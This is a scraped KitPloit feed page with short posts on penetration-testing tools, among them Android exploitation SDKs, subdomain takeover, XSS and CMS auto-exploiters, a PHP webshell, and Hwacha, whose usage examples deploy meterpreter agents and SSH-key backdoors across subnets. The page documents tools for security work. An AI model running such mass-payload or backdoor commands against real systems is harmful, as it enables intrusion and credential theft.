Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

LeakVM - Research & Pentesting Framework For Android, Run Security Tests Instantly

$
0
0

LeakVM: Run security tests instantly.

Why LeakVM:

LeakVM fast security test on Android, by skipping the time-consuming build pen-testing laboratories, you can test on real devices or virtual devices. LeakVM makes researchers and pen-testers more productive since they can run the test on real time and with zero knowledge on malware develop or attacks.

Our technology uses the same techniques used in criminal software, but in a controlled environment, you always have control over the SDK, our product, gives you a real approach against real malware and real attacks.

Why Pentesting:

With 2000 million active devices, 90% of mobile users are vulnerable to exploit kits (software vulnerabilities), Cyber crime damage costs to hit $6 trillion annually by 2021, Mobile Malware Shows Rapid Growth in Volume and Sophistication, Mobile security is a big data problem.

Unsecured devices and apps are the norm, In 2017 every 4.2 seconds a new malware specimen emerges, You need to reduce the threat surface.

Rewards:

Our platform is designed even so that anyone can make money with us, without any type of investment, by sharing your reseller link, the customer that is obtained will bring you rewards, now we have 3 methods of payment: Western Union, Wire Transfer and PayPal, These rewards will be received for life, is just share a link.
For first 100 customers: new client 20%, renewal 10%.
For next 900 clients: new client 15%, renewal 10%.
After reaching 1000 clients: new client 10%, renewal 5%.

Questions:
I can inject ELF/APK code inside of the sandbox of any package ?
Yes, you can.

I can load external libraries ?
Yes, from Git's, Mediafire and another sources.

I can start a HTTP service ?
Yes, as synchronous and asynchronous way.

I can start a HTTP client ?
Yes, we have one, very configurable.

I can analyze security on ELF as V.A.S ? Yes, you can.

I can bypass OOP protections ?
Yes, there not exist: 'package', 'private', 'protected' or 'final'.

I can extract private files from external packages ?
Yes, you can see and get any file.

I can hack the Keystore ?
Yes, you can.

I can trick the Context ?
Yes, you can.

I can hack the SmartLock ?
Yes, you can.

I can use reflections in simple way ?
Yes, you can.

I can see the Linux system in simple way ?
Yes, you can.

I can install it on simple way ?
Yes, just with 2 lines on the gradle.

I can develop plugins with it ?
Yes, on the same way as AAR library.

Any can use it in a simple way ?
Yes, we develop it for dummies.

Features:
  • Ptrace/ASLR/Yama Bypass
  • API for 3rd party projects
  • Linux common features
  • Dynamic library loading
  • SmartLock extraction
  • Private file extractor
  • KeyStore extraction
  • Advanced reflection
  • WebServices Engine
  • Privilege escalation
  • Context Spoofers
  • Core Observers
  • Library injection
  • OOP Bypass
  • Extensible

Support:
  • Android 4.4 to 6.0
  • Architectures Arm(32/64 bits), x86(32/64 bits), MIPS(32/64 bits)

Samples:
Where is JavaDoc
How configure a Virtual Device
How Install LeakVM SDK
How Connect to API
How Test Exploits
How use Common IO methods
How to Load libraries
How to Sudo& Runas
How compile a native binary (ELF)
How to run loaded code
How to Hack OOP
How to Inject code Native/VM
How build VM Code to Inject

Downloads:
LeakVM APP
LeakVM SDK 1.0.0

Web Interface:
LeakVM Console

Social Media:
Twitter
LinkedIn
Facebook
Instagram
LeakVM Developers Group




Rainmap Lite - Responsive Web Based Interface That Allows Users To Launch Nmap Scans From Their Mobiles/Tablets/Web Browsers

$
0
0
Rainmap Lite - Responsive web application that allows users to launch Nmap scans from their mobiles/tablets/web browsers!
Unlike it's predecessor [1], Rainmap-lite does not require special services (RabbitMQ, PostgreSQL, Celery, supervisor, etc) to make it easy to install on any server. You simply need to install the Django application and add the cron polling task to set up a new scanning server. Nmap scans on the road for everyone!


Features
  • Easily launch Nmap scans with a few clicks.
  • Responsive interface runs smoothly from your phone/tablet.
  • Reports delivered by email in all formats.
  • View reports from your web browser.
  • Schedule scans.
  • Dozens of scanning profiles to choose from.
  • Easy to install/set up.
  • Share results with your team.
This project is still in beta version. Any feedback, bug reports and PRs are greatly appreciated!

Demo

Documentation
You can find all the documentation related to this project on the Wiki

Screenshots

*Responsive interface


* Customizable


* Scanning profiles


* Site Administration allows managements of users, scanning profiles and scans



* Cron based


* Results delivered by email



SubOver - A Powerful Subdomain Takeover Tool

$
0
0

Subover is a Hostile Subdomain Takeover tool designed in Python. From start, it has been aimed with speed and efficiency in mind. Till date, SubOver detects 36 services which is much more than any other tool out there. The tool is multithreaded and hence delivers good speed. It can easily detect and report potential subdomain takeovers that exist. The list of potentially hijackable services is very comprehensive and it is what makes this tool so powerful.

Installing
You need to have Python 2.7 installed on your machine. The following additional requirements are required -
  • dnspython
  • colorama
git clone https://github.com/Ice3man543/SubOver.git .
cd SubOver
# consider installing virtualenv
pip install -r requirements.txt
python subover.py -h

Usage
python subover.py -l subdomains.txt -o output_takeovers.txt
  • -l subdomains.txt is the list of target subdomains. These can be discovered using various tool such as sublist3r or others.
  • -o output_takeovers.txtis the name of the output file. (Optional & Currently not very well formatted)
  • -t 20 is the default number of threads that SubOver will use. (Optional)
  • -V is the switch for showing verbose output. (Optional, Default=False)

Currently Checked Services
  • Github
  • Heroku
  • Unbounce
  • Tumblr
  • Shopify
  • Instapage
  • Desk
  • Tictail
  • Campaignmonitor
  • Cargocollective
  • Statuspage
  • Amazonaws
  • Cloudfront
  • Bitbucket
  • Squarespace
  • Smartling
  • Acquia
  • Fastly
  • Pantheon
  • Zendesk
  • Uservoice
  • WPEngine
  • Ghost
  • Freshdesk
  • Pingdom
  • Tilda
  • Wordpress
  • Teamwork
  • Helpjuice
  • Helpscout
  • Cargo
  • Feedpress
  • Freshdesk
  • Surge
  • Surveygizmo
  • Mashery
Count : 36

FAQ
Q: What should my wordlist look like?
A: Your wordlist should include a list of subdomains you're checking and should look something like:
backend.example.com
something.someone.com
apo-setup.fxc.something.com

Your tool sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Contact
Twitter: @Ice3man543

Credits


XSStrike v2.0 - An Advanced XSS Detection And Exploitation Suit

$
0
0

XSStrike is an advanced XSS detection suite. It has a powerful fuzzing engine and provides zero false positive result using fuzzy matching. XSStrike is the first XSS scanner to generate its own payloads. It is intelligent enough to detect and break out of various contexts.


Features
  • Powerful fuzzing engine
  • Context breaking technology
  • Intelligent payload generation
  • GET & POST method support
  • Cookie Support
  • WAF Fingerprinting
  • Hand crafted payloads for filter and WAF evasion
  • Hidden parameter discovery
  • Accurate results via levenshtein distance algorithm
To know more visit xsstrike.tk

Installation
XSStrike is compatible with all *nix based operating systems running Python 2.7. Why not windows? My life, my rules. My code, my tools. Just kidding, it will run on windows as well but you will see some weird codes instead of color. First of all clone the repo by entering the following command in terminal
git clone https://github.com/UltimateHackers/XSStrike
Now naviagte to XSStrike directory
cd XSStrike
Now install the requirements with the following command
pip install -r requirements.txt
Now you can run XSStrike
python xsstrike

Screenshots





Retire.Js - Scanner Detecting The Use Of JavaScript Libraries With Known Vulnerabilities

$
0
0

What you require you must also retire
There is a plethora of JavaScript libraries for use on the Web and in Node.JS apps out there. This greatly simplifies development,but we need to stay up-to-date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 list of security risks and insecure libraries can pose a huge risk to your Web app. The goal of Retire.js is to help you detect the use of JS-library versions with known vulnerabilities.
Retire.js can be used in many ways:
  1. As command line scanner
  2. As a grunt plugin
  3. As a gulp task
  4. As a Chrome extension
  5. As a Firefox extension
  6. As a Burp and OWASP Zap plugin

Command line scanner
Scan a web app or node app for use of vulnerable JavaScript libraries and/or Node.JS modules. In the source code folder of the application folder run:
$ npm install -g retire
$ retire

Grunt plugin
A Grunt task for running Retire.js as part of your application's build routine, or some other automated workflow.

Gulp task
An example of a Gulp task which can be used in your gulpfile to watch and scan your project files automatically. You can modify the watch patterns and (optional) Retire.js options as you like.
var gulp = require('gulp');
var spawn = require('child_process').spawn;
var gutil = require('gulp-util');

gulp.task('retire:watch', ['retire'], function (done) {
// Watch all javascript files and package.json
gulp.watch(['js/**/*.js', 'package.json'], ['retire']);
});

gulp.task('retire', function() {
// Spawn Retire.js as a child process
// You can optionally add option parameters to the second argument (array)
var child = spawn('retire', [], {cwd: process.cwd()});

child.stdout.setEncoding('utf8');
child.stdout.on('data', function (data) {
gutil.log(data);
});

child.stderr.setEncoding('utf8');
child.stderr.on('data', function (data) {
gutil.log(gutil.colors.red(data));
gutil.beep();
});
});

Chrome and firefox extensions
Scans visited sites for references to insecure libraries, and puts warnings in the developer console. An icon on the address bar displays will also indicate if vulnerable libraries were loaded.

Burp and OWASP ZAP plugin
@h3xstream has adapted Retire.js as a plugin for the penetration testing tools Burp and OWASP ZAP. An alternative OWASP ZAP plugin exists at https://github.com/nikmmy/retire/


Webscreenshot - A Simple Script To Screenshot A List Of Websites

$
0
0

A simple script to screenshot a list of websites, based on the url-to-image phantomjs script.

Features
  • Integrating url-to-image 'lazy-rendering' for AJAX resources
  • Fully functional on Windows and Linux systems
  • Cookie and custom HTTP header definition support
  • Multiprocessing and killing of unresponding processes after a user-definable timeout
  • Accepts several format as input target
  • Maps useful options of phantomjs such as ignoring ssl error, proxy definition and proxy authentication, HTTP Basic Authentication

Usage
Put your targets in a text file and pass it to the script (-i).
Screenshots will be available in your current ./screenshots/ directory (default).
Accepted input formats are the following:
http(s)://domain_or_ip:port(/ressource)
domain_or_ip:port(/ressource)
domain_or_ip(/ressource)

Options
$ python webscreenshot.py -h
Usage: webscreenshot.py [options]

Options:
-h, --help show this help message and exit

Main parameters:
-i INPUT_FILE, --input-file=INPUT_FILE
<INPUT_FILE>: text file containing the target list.
Ex: list.txt
-o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY
<OUTPUT_DIRECTORY> (optional): screenshots output
directory (default './screenshots/')
-w WORKERS, --workers=WORKERS
<WORKERS> (optional): number of parallel execution
workers (default 2)
-v, --verbosity <VERBOSITY> (optional): verbosity level, repeat it to
increase the level { -v INFO, -vv DEBUG } (default
verbosity ERROR)

Input processing parameters:
-p PORT, --port=PORT
<PORT> (optional): use the specified port for each
target in the input list. Ex: -p 80
-s, --ssl <SSL> (optional): enforce ssl for every connection
-m, --multiprotocol
<MULTIPROTOCOL> (optional): perform screenshots over
HTTP and HTTPS for each target

HTTP parameters:
-c COOKIE, --cookie=COOKIE
<COOKIE_STRING> (optional): cookie string to add. Ex:
-c "JSESSIONID=1234; YOLO=SWAG"
-a HEADER, --header=HEADER
<HEADER> (optional): custom or additional header.
Repeat this option for every header. Ex: -a "Host:
localhost" -a "Foo: bar"
-u HTTP_USERNAME, --http-username=HTTP_USERNAME
<HTTP_USERNAME> (optional): specify a username for
HTTP Basic Authentication.
-b HTTP_PASSWORD, --http-password=HTTP_PASSWORD
<HTTP_PASSWORD> (optional): specify a password for
HTTP Basic Authentication.

Connection parameters:
-P PROXY, --proxy=PROXY
<PROXY> (optional): specify a proxy. Ex: -P
http://proxy.company.com:8080
-A PROXY_AUTH, --proxy-auth=PROXY_AUTH
<PROXY_AUTH> (optional): provides authentication
information for the proxy. Ex: -A user:password
-T PROXY_TYPE, --proxy-type=PROXY_TYPE
<PROXY_TYPE> (optional): specifies the proxy type,
"http" (default), "none" (disable completely), or
"socks5". Ex: -T socks
-t TIMEOUT, --timeout=TIMEOUT
<TIMEOUT> (optional): phantomjs execution timeout in
seconds (default 30 sec)

Examples
list.txt
--------
http://google.fr
https://173.194.67.113
173.194.67.113
https://duckduckgo.com/robots.txt


Default execution
-----------------
$ python webscreenshot.py -i list.txt
webscreenshot.py version 1.0

[+] 4 URLs to be screenshot
[+] 4 actual URLs screenshot
[+] 0 errors


Increasing verbosity level execution
-----------------------------------
$ python webscreenshot.py -i list.txt -v
webscreenshot.py version 1.1

[INFO][General] 'http://google.fr' has been formatted as 'http://google.fr:80' with supplied overriding options
[INFO][General] 'https://173.194.67.113' has been formatted as 'https://173.194.67.113:443' with supplied overriding options
[INFO][General] '173.194.67.113' has been formatted as 'http://173.194.67.113:80' with supplied overriding options
[INFO][General] 'https://duckduckgo.com/robots.txt' has been formatted as 'https://duckduckgo.com:443/robots.txt' with supplied overriding options
[+] 4 URLs to be screenshot
[INFO][http://173.194.67.113:80] Screenshot OK
[INFO][https://173.194.67.113:443] Screenshot OK
[INFO][http://google.fr:80] Screenshot OK
[INFO][https://duckduckgo.com:443/robots.txt] Screenshot OK
[+] 4 actual URLs screenshot
[+] 0 errors

Results
-------
$ ls -l screenshots/
total 61
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 http___173.194.67.113_80.png
-rwxrwxrwx 1 root root 38152 Jan 12 19:46 http___google.fr_80.png
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 https___173.194.67.113_443.png
-rwxrwxrwx 1 root root 12828 Jan 12 19:46 https___duckduckgo.com_443_robots.txt.png

Requirements
  • Python 2.7
  • webscreenshot python script:
    • The easiest way to setup it: pip install webscreenshot and then directly use $ webscreenshot
    • Or git clone that repository
  • Phantomjs > 2.x : follow the installation guide and check the FAQ if necessary

Changelog
  • version 2.1 - 01/14/2018: Multiprotocol option addition and PyPI packaging
  • version 2.0 - 03/08/2017: Adding proxy-type option
  • version 1.9 - 01/10/2017: Using ALL SSL/TLS ciphers
  • version 1.8 - 07/05/2015: Option groups definition
  • version 1.7 - 06/28/2015: HTTP basic authentication support + loglevel option changed to verbosity
  • version 1.6 - 04/23/2015: Transparent background fix
  • version 1.5 - 01/11/2015: Cookie and custom HTTP header support
  • version 1.4 - 10/12/2014: url-to-image phantomjs script integration + few bugs corrected
  • version 1.3 - 08/05/2014: Windows support + few bugs corrected
  • version 1.2 - 04/27/2014: few bugs corrected
  • version 1.1 - 04/21/2014: Changed the script to use phantomjs instead of the buggy wkhtml binary
  • version 1.0 - 01/12/2014: Initial commit

Contact
  • Thomas Debize < tdebize at mail d0t com >


Mooscan - A Scanner For Moodle LMS

$
0
0

A scanning tool for Moodle LMS.

Key Benefits
  • Allows administrators to determine exactly what is visible externally in their Moodle installation.
  • A tool for penetration testers to find potential vulnerabilities in a Moodle installation by enumerating installed plugins, themes and libraries.

Road Map
To be defined once the basic (MVP!) tool is released, functional and reliable.

    WhoAmIMailBot - A Service To Mask Your Email

    $
    0
    0

    What is it?
    A service to mask your e-mails, it was inspired by Blur service, where you create a alias for your e-mail, and use it to signup on applications, but the problem on Blur, is that all e-mails pass trough they infraestructure, and I don't need anybody looking on my e-mails, to solve that, I created WhoAmIMailBot that's similar to Blur service, and runs on your own infraestructure.

    How it works?
    Basically you need a domain, to not expend money you can use no-ip services, one VPS that allows smtp outbound, a telegram bot id, your telegram user id and this project, when you have all these things, you're ready to go. Your VPS will run a postfix that'll just redirect e-mails using the postfix function of virtual alias, where you set a e-mail address to redirect all incoming messages to another e-mail, the no-ip domain will be domain wich you'll use on your alias e-mails, and the telegram bot will manage your alias.

    Install
    git clone https://github.com/mthbernardes/WhoAmIMailBot.git
    cd WhoAmIMailBot
    docker build -t whoamimailbot --build-arg domain=your-domain-goes-here.ddns.net .
    docker run -p 25:25 -d -v /data/postfix/:/data whoamimailbot -t telegram-bot-api -d your-domain-goes-here.ddns.net -i your-telegram-user-id,another-telegram-user-id

    Usage
    On your telegram bot you have the follow commands,
    CommandDescription
    /listList all available aliasi
    /new mail@mail.comCreate a new alias for the given mail
    /delete bystringDelete alias by a given string



    Envizon - Network Visualization Tool With Focus On Red / Blue Team Requirements

    $
    0
    0
    This tool is designed, developed and supported by evait security. In order to give something back to the security community, we publish our internally used and developed, state of the art network visualization and organization tool, 'envizon'. We hope your feedback will help to improve and hone it even further.

    Core Features:
    • Scan networks with predefined or custom nmap queries
    • Order clients with preconfigured or custom groups
    • Search through all attributes of clients and create complex linked queries
    • Get an overview of your targets during pentests with predefined security labels
    • Save and reuse your most used nmap scans
    • Collaborate with your team on the project in realtime
    • Export selected clients in a text file to connect other tools fast

    How to start?!
    To avoid compatibility and dependency issues, and to make it easy to set up, we use Docker. You can build your own images or use prebuilt ones from Docker Hub.

    Using Docker
    Docker and Docker Compose are required.
    git clone https://github.com/evait-security/envizon
    cd envizon
    # Create self-signed certificates:
    mkdir .ssl
    openssl req -x509 -sha256 -nodes -newkey rsa:2048 -days 365 -keyout .ssl/localhost.key -out .ssl/localhost.crt
    # If you want to use certificates located elsewhere, provide their pathes with SSL_CERT_PATH and SSL_KEY_PATH
    # Create a secret, if you have rails installed locally you can just use:
    rails secret
    # otherwise, use openssl:
    openssl rand -hex 64
    # this needs to be provided either as an environment variable (SECRET_KEY_BASE), or added in the docker-compose.yml
    sudo docker-compose up

    Development
    If, for whatever reason, you want to run the development environment in production, you should probably consider changing the secrets in config/secrets.yml, and maybe even manually activate SSL.
    git clone https://github.com/evait-security/envizon
    cd envizon
    sudo docker-compose -f docker-compose-development.yml up
    Running tests:
    docker exec -it envizon_container_name_1 /bin/ash -c 'rails test'

    Without Docker
    Requires a PostgreSQL server.
    Create a database envizon with a user envizon. Password and socket location can be modified in the docker-compose.yml. Your user needs SUPERUSER privileges; otherwise database import (and tests) won't work, because of foreign key constraints: use ALTER USER user WITH SUPERUSER;.
    git clone https://github.com/evait-security/envizon
    cd envizon
    bundle install --path vendor/bundle
    You need to create a secret and SSL certificates, as described above.
    Then, run it with:
    RAILS_ENV=production
    export RAILS_ENV
    SECRET_KEY_BASE=YOUR_SECRET
    export SECRET_KEY_BASE
    bundle exec rails db:setup
    bundle exec rails db:migrate
    bundle exec rails db:seed
    bundle exec rails assets:precompile
    RAILS_FORCE_SSL=true RAILS_SERVE_STATIC_FILES=true bundle exec rails s

    Development
    Databases for development and testing are called envizon_test and envizon_development, with the same requirements as above. Different database names and credentials can be provided via environment variables or directly modified in config/database.yml
    git clone https://github.com/evait-security/envizon
    cd envizon
    bundle install --path vendor/bundle
    RAILS_ENV=development
    export RAILS_ENV
    bundle exec rails db:setup
    bundle exec rails db:migrate
    bundle exec rails db:seed
    bundle exec rails s
    To run the tests:
    RAILS_ENV=test db:setup
    bundle exec rails test

    Start with prebuilt images and postgresql docker image
    Coming Soon™

    Set a password
    After starting the docker images go to: https://localhost:3000/ (or http://localhost:3000 if not using SSL)
    You have to specify a password for your envizon instance. You can change it in the settings interface after logging in.


    Scan interface
    The scan interface is divided in two sections. On the left side you can run a new scan with preconfigured parameters or your own nmap fu. You also have the possibility to upload previously created nmap scans (with the -oX parameter).


    On the right side you will see your running and finished scans.


    Groups
    The group interface is the heart of envizon. You can select, group, order, quick search, global search, move, copy, delete and view your clients. The left side represents the group list. If you click on a group you will get a detailed view in the center of the page with the group content. Each client in a group has a link. By clicking on the IP address you will get a more detailed view on the right side with all attributes, labels, ports and nmap output.
    Most of the buttons and links have tooltips.


    Global Search
    In this section you can search for nearly anything in the database and combine each search parameter with 'AND', 'OR' & 'NOT'.
    Perform simple queries for hostname, IP, open ports, etc. or create combined queries like: hostname contains 'win' AND mac address starts with '0E:5C' OR has port 21 and 22 open.


    FAQ
    API ?!
    • Currently not. We will work on it. Maybe.
    Which browsers are supported?
    • Latest Chrome / Chromium / Inox & Firefox / Waterfox.
    Why rails?!
    • Wanted to learn ruby. It's cool.
    Why so salty on github issue discussion?
    • This is a community project. We are a full time pentesting company and will not go into / care about every open issue that doesn't match our template or guidelines. If you get a rough answer or picture, you probably deserved it.

    What frameworks and tools were used?

    Help?
    You can get some information about the structure and usage on the official wiki.
    https://github.com/evait-security/envizon/wiki


    Adhrit - Android APK Reversing And Analysis Tool That Can Help Secuity Researchers And CTF Enthusiasts Alike

    $
    0
    0

    Adhrit is an open source Android APK reversing and analysis tool that can help security researchers and CTF enthusiasts alike. The tool is an effort to cut down on the amount of time spent on reversing and basic reconnaissance of Android applications. The project is still under progress and will continually incorporate features with time.

    USES:
    • Extracts the apk contents.
    • Disassembles native libraries
    • Extracts jar out of dex.
    • Extracts source code in Java.
    • Extracts source code in Smali.
    • Recompiles smali into APK
    • Signs the APK
    • Checks for bytecode injection points.
    • Analyzes permissions used by the application.
    • Dumps the Manifest.
    • Dumps the certificate details.
    • Checks for malware footprints in the VirusTotal database.

    PRE-REQUISITES:
    • Linux or MAC
    • Java JDK

    USAGE:
    1. Dowload the zip or clone the package and extract the tool ( git clone https://github.com/abhi-r3v0/Adhrit.git ).
    2. Place the application in the tool directory.
    3. Open a terminal and cd into the directory.
    4. Run python installer.py for installing the necessary tools.
    5. Use python adhrit.py -h for usage help.
    Example: python adhrit.py -a my_app.apk

    SCREENSHOTS:






    NOTE:
    1. Filenames with two '.' may give an error. Please rename the apk in such cases. For example, if your file name is my.app.apk, rename it to myapp.apk


    Physics Platform - A Remote Hardware Hacking Platform

    $
    0
    0

    Physics platform is a tool for hardware systems (e.g: raspberryPi 3B). It retrieves data passing through the network and sends it to a control panel. It works the same way as a botnet by receiving remote commands. (you can imagine that as a black box).

    Physics hardware
    You can check repository of physics-hardware

    INSTALLATION
    1. composer update
    2. generate .env with database information
    3. php artisan migrate
    4. php artisan physics:createUser username password
    5. php artisan key:generate
    6. configure your domain to public/ folder.
    7. configure a cronjob (* * * * * php /physics-commandProject/artisan schedule:run >> /dev/null 2>&1)


    Hwacha - Deploy Payloads To *Nix Systems En Masse

    $
    0
    0

    Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.
    $python hwacha.py 
    &&&& && && &&
    &&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
    &&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
    && && &&&&& && &&&&& Twitter: @n00py1 \| ___/
    && && &&&&& && && &&&&& _ _ _
    && && && && && && | | | | | |
    &&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
    && && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
    &&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
    && && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
    To run commands, use -x [COMMAND]
    to run modules, use -m [MODULE]
    to specify module options, use -o [ARG=ARG ARG=ARG]
    to see all available modules, use -L
    Example usage:
    python hwacha.py -t 192.168.1.1/24 -u admin -p password
    python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
    python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
    python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"


    Available Modules:
    [*] meterpreter Use this to execute a meterpreter agent on the target(s).
    REQURED ARGUMENTS: LHOST , LPORT
    OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}
    [*] mimipenguin Use this to execute a mimipenguin on the target(s) to recover credentials. (Requires root)
    OPTIONAL ARGUMENTS: LHOST, LPORT
    [*] keys Use this to collect SSH private keys from the target(s).
    [*] history Use this to collect shell history files from the target(s).
    [*] privs Use this to enumerate sudo privileges on the targets(s).
    [*] backdoor Creates an RSA key pair and adds public key to authorized_keys file on targets(s).
    [*] web_delivery Use this to execute a python script on the target(s).
    REQURED ARGUMENTS: PATH
    OPTIONAL ARGUMENTS: LISTEN
    [*] custom_bin Use this to execute a custom binary on the target(s).
    REQURED ARGUMENTS: PATH
    [*] sudo_exec Use this to execute a custom binary (with sudo) on the target(s).
    REQURED ARGUMENTS: PATH
    [*] shellcode Use this to execute custom shellcode on the target(s).
    REQURED ARGUMENTS: PATH
    Requires paramiko:
    pip install paramiko 

    More info: https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/


    B4Tm4N - PHP WEBSHELL

    $
    0
    0

    Features
    • [0] File Manager
    • [1] Sec. Info
    • [2] Simply Database
    • [3] Interactive terminal
    • [4] PHP Reverse Back Connect
    • [5] Run PHP Code
    • [6] Custom Toolz
    • [7] Self Script Encryptor !

    53R3N17Y - Python Based Script For Information Gathering

    $
    0
    0


    Python based script for Information Gathering.

    Operating Systems Tested
    • OSX El Capitan 10.11
    • Ubuntu 16.04
    • Backbox 5

    Install

    MacOSX
    (as root)
      git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
    >echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.zshrc
    cd /usr/local/share/serenity
    pip install -r requirements.txt
    serenity -h

    Linux
    (as root)
      git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
    >echo 'alias serenity="/usr/local/share/serenity && ./serenity"' > ~/.bashrc
    cd /usr/local/share/serenity
    pip install -r requirements.txt
    serenity -h
    note: tested with Python 2.7.14


    Magescan - Scan A Magento Site For Information

    $
    0
    0

    The idea behind this is to evaluate the quality and security of a Magento site you don't have access to. The scenario when you're interviewing a potential developer or vetting a new client and want to have an idea of what you're getting into.

    Installation

    .phar
    php magescan.phar scan:all www.example.com

    Source
    • Clone this repository
    • Install with composer
    git clone https://github.com/steverobbins/magescan magescan
    cd magescan
    curl -sS https://getcomposer.org/installer | php
    php composer.phar install
    bin/magescan scan:all www.example.com

    n98-magerun
    Clone into your ~/.n98-magerun/modules directory
    mkdir -p ~/.n98-magerun/modules
    git clone https://github.com/steverobbins/magescan ~/.n98-magerun/modules/magescan
    magerun magescan:scan store.example.com

    Composer
    composer require steverobbins/magescan --dev

    Include in your project
    Add the following to your composer.json
    "require": {
    "steverobbins/magescan": "dev-master"
    }

    Usage
    $ magescan.phar scan:all store.example.com

    Commands

    scan:all
    $ magescan.phar scan:all [--insecure|-k] [--show-modules] <url>
    Run all scans on the given <url>.

    Options

    --format=FORMAT
    Specify a different output format. Possible values:
    • default
    • json

    --insecure, -k
    If set, SSL certificates won't be validated

    --show-modules
    Lists all modules searched for, not just those found

    scan:catalog
    $ magescan.phar scan:catalog [--insecure|-k] <url>
    Get catalog information

    scan:modules
    $ magescan.phar scan:modules [--insecure|-k] [--show-modules] <url>
    Get installed modules

    scan:patch
    $ magescan.phar scan:patch [--insecure|-k] <url>
    Get patch information

    scan:server
    $ magescan.phar scan:server [--insecure|-k] <url>
    Check server technology

    scan:sitemap
    $ magescan.phar scan:sitemap [--insecure|-k] <url>
    Check sitemap

    scan:unreachable
    $ magescan.phar scan:unreachable [--insecure|-k] <url>
    Check unreachable paths

    scan:version
    $ magescan.phar scan:version [--insecure|-k] <url>
    Get the version of a Magento installation
    Show all modules that we tried to detect, not just those that were found

    self-update
    $ magescan.phar self-update
    Updates the phar file to the latest version.



    Pyfiscan - Web-Application Vulnerability And Version Scanner

    $
    0
    0

    Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.

    Requirements
    • Python 2.7
    • Python modules PyYAML docopt
    • GNU/Linux web server
    Testing is done mainly with GNU/Linux Debian stable. Windows is not currently supported.

    Detects following software
    • ATutor
    • b2evolution
    • BigTree CMS
    • Bugzilla
    • Centreon
    • Claroline
    • ClipperCMS
    • CMSimple
    • CMSMS
    • Collabtive
    • Concrete5
    • Coppermine
    • Cotonti
    • Croogo
    • CubeCart
    • Dolibarr
    • Dotclear
    • Drupal
    • e107
    • EspoCRM
    • Etherpad
    • FluxBB
    • Foswiki
    • Gallery
    • Gollum
    • HelpDEZk
    • HumHub
    • ImpressCMS
    • ImpressPages
    • Jamroom
    • Joomla
    • Kanboard
    • KCFinder
    • LiteCart
    • Magnolia
    • Mahara
    • MantisBT
    • MediaWiki
    • Microweber
    • MiniBB
    • MODX Revolution
    • MoinMoin
    • MyBB
    • Nibbleblog
    • Open Source Social Network
    • OpenCart
    • osDate
    • ownCloud
    • Oxwall
    • PBBoard
    • phpBB3
    • PhpGedView
    • phpMyAdmin
    • Piwigo
    • Piwik
    • PmWiki
    • Postfix Admin
    • Redaxo
    • Roundcube
    • SaurusCMS
    • Serendipity
    • Shaarli
    • SMF
    • Spina CMS
    • SPIP
    • SquirrelMail
    • TestLink
    • TikiWiki
    • Trac
    • WikkaWiki
    • WordPress
    • X-Cart
    • Zenphoto
    • Zikula

    Detects following end-of-life software:
    • Bugzilla 4.2 is end-of-life since 2015-11-30
    • Drupal 6 is end-of-life since 2016-02-24
    • Gallery 1
    • Joomla 1.5 is end-of-life since 2012-04-30
    • Joomla 1.6 is end-of-life since 2011-08-19. 1.6.x should be upgraded to 1.6.6 before moving to 1.7.x
    • Joomla 1.7 is end-of-life since 2012-02-24
    • Joomla 2.5
    • MediaWiki 1.18
    • MediaWiki 1.19 is end-of-life since 2015-04-25
    • MediaWiki 1.20
    • MediaWiki 1.21 is end-of-life since 2014-06-25
    • MediaWiki 1.22
    • MediaWiki 1.23 is end-of-life since 2017-05-31
    • MediaWiki 1.24
    • MediaWiki 1.25
    • MediaWiki 1.26 is end-of-life since 2016-11-20
    • MediaWiki 1.28 is end-of-life since 2017-11-01
    • ownCloud 4
    • ownCloud 5
    • ownCloud 6
    • ownCloud 7
    • ownCloud 8.0
    • ownCloud 8.1
    • ownCloud 8.2
    • SaurusCMS

    Installation
    apt-get install python python-pip libpython2.7-dev libyaml-dev git libyaml-dev
    git clone https://github.com/fgeek/pyfiscan.git && cd pyfiscan
    pip2 install -r requirements.lst
    or you can use BlackArch Linux.

    Notes


    BadMod - BadMod Detect Website CMS, Website Scanner & Auto Exploiter

    $
    0
    0

    Auto exploiter & get all server sites & bing dorker

    Installation
    git clone https://github.com/MrSqar-Ye/BadMod.git

    BadMod tool
    Detect website cms & website scanner =&> Auto exploiter


    Exploit :
    [!] Wordpress
    [+] joomla
    [!] drupal
    [+] Cms made simple 


    Video



    CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems

    $
    0
    0

    CHAOS allow generate payloads and control remoteWindows systems.

    Disclaimer
    This project was created only for learning purpose.
    THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

    Features
    • Reverse Shell
    • Download File
